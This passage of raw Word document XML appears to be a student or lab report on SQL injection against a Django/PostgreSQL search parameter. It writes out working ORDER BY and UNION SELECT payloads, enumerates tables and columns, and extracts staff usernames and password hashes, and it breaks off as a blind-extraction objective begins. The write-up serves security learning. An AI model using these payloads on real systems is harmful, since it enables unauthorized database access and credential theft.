      <w:tr w:rsidR="004A4D58" w14:paraId="20C04672" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="22689246" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRPr="00E12E7D" w:rsidRDefault="004A4D58" w:rsidP="007956BD">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+ORDER+BY+5--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7923E004" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00C16241">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC60AC0" wp14:editId="3F515DB0">
            <wp:extent cx="6771736" cy="4013508"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="695045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045568" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6779380" cy="4018038"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927FF53" w14:textId="4162096A" w:rsidR="004A4D58" w:rsidRPr="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.3b: Burp request with ORDER BY 5 returning HTTP 500 Internal Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1EB9C" w14:textId="3AF2DBCD" w:rsidR="004A4D58" w:rsidRPr="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="004A4D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORDER BY 4 returned HTTP 200 OK, while ORDER BY 5 returned HTTP 500 Internal Server Error. This showed that the original query returned four columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB8E9C" w14:textId="1DD71F46" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 UNION Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44844FFB" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:r>
        <w:t>After confirming the four-column structure, I tested a UNION SELECT payload with four values. Using string values in every column caused a server error, which showed that not every selected column accepted text. I then replaced the non-text positions with NULL values:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="004A4D58" w14:paraId="0476A172" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5211805F" w14:textId="140F8B99" w:rsidR="004A4D58" w:rsidRPr="00E12E7D" w:rsidRDefault="004A4D58" w:rsidP="007956BD">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+UNION+SELECT+’aaaa’,’</w:t>
            </w:r>
            <w:r w:rsidR="0076637F">
              <w:t>bbbb’,’cccc’,’dddd’</w:t>
            </w:r>
            <w:r>
              <w:t>--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DA28289" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00C16241">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD3B3A4" wp14:editId="6A5B76EF">
            <wp:extent cx="6858000" cy="4084320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1214198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198009" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4084320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C673518" w14:textId="28281F9C" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.4a: Initial UNION SELECT test with text in all four columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C4B4C" w14:textId="24A6CE5E" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t>After trial and error, I ended up with this combination:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="0076637F" w14:paraId="6B5C5410" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3D5119EC" w14:textId="39B44D77" w:rsidR="0076637F" w:rsidRPr="00E12E7D" w:rsidRDefault="0076637F" w:rsidP="007956BD">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+UNION+SELECT+NULL,’bbbb’,’cccc’,NULL--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EB046C1" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00C16241">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCC8AB4" wp14:editId="416ACF07">
            <wp:extent cx="6858000" cy="4194175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1254649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649796" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4194175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931BA37" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.4b: Adjusted UNION SELECT using NULL values in non-text columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C0615" w14:textId="319B71AB" w:rsidR="0076637F" w:rsidRPr="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:r w:rsidRPr="0076637F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="00762AF6">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r>
        <w:t>he adjusted UNION query returned HTTP 200 OK. This confirmed that the second and third columns could carry text values, while the first and fourth columns could safely be filled with NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C1CB2" w14:textId="51EEACC7" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Table and Column Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872B3BE" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:r>
        <w:t>With a working UNION structure, I queried PostgreSQL's information_schema tables through the visible text column:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="0076637F" w14:paraId="43A9F810" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3EFE7A63" w14:textId="6ED944E4" w:rsidR="0076637F" w:rsidRPr="00E12E7D" w:rsidRDefault="0076637F" w:rsidP="007956BD">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+UNION+SELECT+NULL,table_name,NULL,NULL+FROM+information_schema.table+WHERE+table_schema=’public’--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A65AADB" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00031DB8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38BEA093" wp14:editId="1D65C630">
            <wp:extent cx="6858000" cy="2033905"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="682857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857485" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2033905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D4A6BE" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.5a: Burp request enumerating public table names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6C787" w14:textId="3E422058" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="0076637F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00762AF6">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he response returned 37 public table names. The list included auth_user, which is the Django account table and matched the target data for this objective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23C0F7" w14:textId="69F0EBC4" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00031DB8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A91ACDF" wp14:editId="15F72F2B">
            <wp:extent cx="6858000" cy="2977515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="561734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734759" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2977515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A1B2C" w14:textId="0F5506B8" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.5b: Search response showing public table names including auth_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624AEB6" w14:textId="77777777" w:rsidR="0076637F" w:rsidRDefault="0076637F" w:rsidP="0076637F">
      <w:r>
        <w:t>I then used the same method to identify the relevant column names:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="0076637F" w14:paraId="34AE565E" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3F90E502" w14:textId="48516785" w:rsidR="0076637F" w:rsidRPr="00E12E7D" w:rsidRDefault="0076637F" w:rsidP="007956BD">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+UNION+SELECT+NULL,</w:t>
            </w:r>
            <w:r w:rsidR="00762AF6">
              <w:t>column</w:t>
            </w:r>
            <w:r>
              <w:t>_name,NULL,NULL+FROM+information_schema.</w:t>
            </w:r>
            <w:r w:rsidR="00762AF6">
              <w:t>columns</w:t>
            </w:r>
            <w:r>
              <w:t>+WHERE+table_</w:t>
            </w:r>
            <w:r w:rsidR="00762AF6">
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:t>=’</w:t>
            </w:r>
            <w:r w:rsidR="00762AF6">
              <w:t>auth_user</w:t>
            </w:r>
            <w:r>
              <w:t>’--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E1073C5" w14:textId="0429C90D" w:rsidR="00762AF6" w:rsidRDefault="00762AF6" w:rsidP="0076637F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00762AF6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5212BD08" wp14:editId="2D1A1AF4">
            <wp:extent cx="6858000" cy="2050415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1815358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358910" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2050415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21A64A" w14:textId="368C9D84" w:rsidR="00762AF6" w:rsidRDefault="00762AF6" w:rsidP="00762AF6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.5c: Burp request enumerating auth_user table columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1A7D0" w14:textId="6E7FE203" w:rsidR="0076637F" w:rsidRDefault="00762AF6" w:rsidP="0076637F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00762AF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The response returned 11 auth_user column names. </w:t>
      </w:r>
      <w:r w:rsidR="0076637F">
        <w:t>The relevant columns were username and password, which could be selected directly from auth_user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDCE087" w14:textId="77777777" w:rsidR="00762AF6" w:rsidRDefault="00762AF6" w:rsidP="00762AF6">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00762AF6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5684D7C4" wp14:editId="0D2BC76C">
            <wp:extent cx="6858000" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="228341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341827" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1308100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B22F6DC" w14:textId="7CB21C6E" w:rsidR="00762AF6" w:rsidRDefault="00762AF6" w:rsidP="00762AF6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.5d: Search response showing auth_user columns including username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1E84D" w14:textId="59DF2830" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.6 Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A909B97" w14:textId="77777777" w:rsidR="00762AF6" w:rsidRDefault="00762AF6" w:rsidP="00762AF6">
      <w:r>
        <w:t>Finally, I selected the username and password columns from auth_user and concatenated them into one visible text field:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00762AF6" w14:paraId="23BC4890" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0E13AC0E" w14:textId="20D3BCBF" w:rsidR="00762AF6" w:rsidRPr="00E12E7D" w:rsidRDefault="00762AF6" w:rsidP="007956BD">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+UNION+SELECT+NULL,</w:t>
            </w:r>
            <w:r w:rsidR="003A58FB">
              <w:t>+username+||+’:’+||+password</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="003A58FB">
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:t>NULL,</w:t>
            </w:r>
            <w:r w:rsidR="003A58FB">
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:t>NULL+FROM+auth_user--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FD37806" w14:textId="101BCE61" w:rsidR="003A58FB" w:rsidRDefault="003A58FB" w:rsidP="003A58FB">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="003A58FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The response returned four account records. Each row displayed a username followed by its stored PBKDF2-SHA256 password hash. The returned users included rmasri, jdoe, admin, and tokafor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC3A45" w14:textId="77777777" w:rsidR="003A58FB" w:rsidRDefault="003A58FB" w:rsidP="003A58FB">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00031DB8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="069E1A3E" wp14:editId="1E2CCF0F">
            <wp:extent cx="6858000" cy="2936240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1146565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565358" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2936240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3B70A" w14:textId="4B3A3631" w:rsidR="00762AF6" w:rsidRPr="00762AF6" w:rsidRDefault="003A58FB" w:rsidP="003A58FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.6: UNION SELECT response displaying staff usernames and stored password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751F358" w14:textId="113BBEB4" w:rsidR="004A4D58" w:rsidRPr="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.7 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A8209" w14:textId="08906896" w:rsidR="003A58FB" w:rsidRDefault="003A58FB" w:rsidP="001221CA">
      <w:r>
        <w:t>Objective 3 was achieved. The q parameter can be used with UNION SELECT to change the search query from returning ticket data to returning records from the auth_user table. By matching the four-column structure and placing text data in a reflected column, the search response displayed staff usernames and their stored password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878C02F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:lastRenderedPageBreak/>
        <w:t>Objective 4: Blind Extraction of the Administrator's Password Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B718F90" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:t>4.1 Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D3B8A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:t>Objective 3's UNION injection displayed the stolen data directly in the results table. For this objective, the goal is to recover the same data through a request whose response never contains it: only a true/false signal. I reused the confirmed 4-column UNION structure from Objective 3, but instead of selecting real data, I appended a WHERE clause so the injected row only appears when a condition is true. The presence or absence of that extra row (visible only as a change in the match count, e.g. "1 match." vs "0 matches.") is the oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A65393" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:t>4.2 Confirming the Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0FD4D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:t>Before automating, I verified the oracle manually with a condition guaranteed to be true and one guaranteed to be false, using the length of the admin password hash as the test condition.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001221CA" w:rsidRPr="001221CA" w14:paraId="3AB36784" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
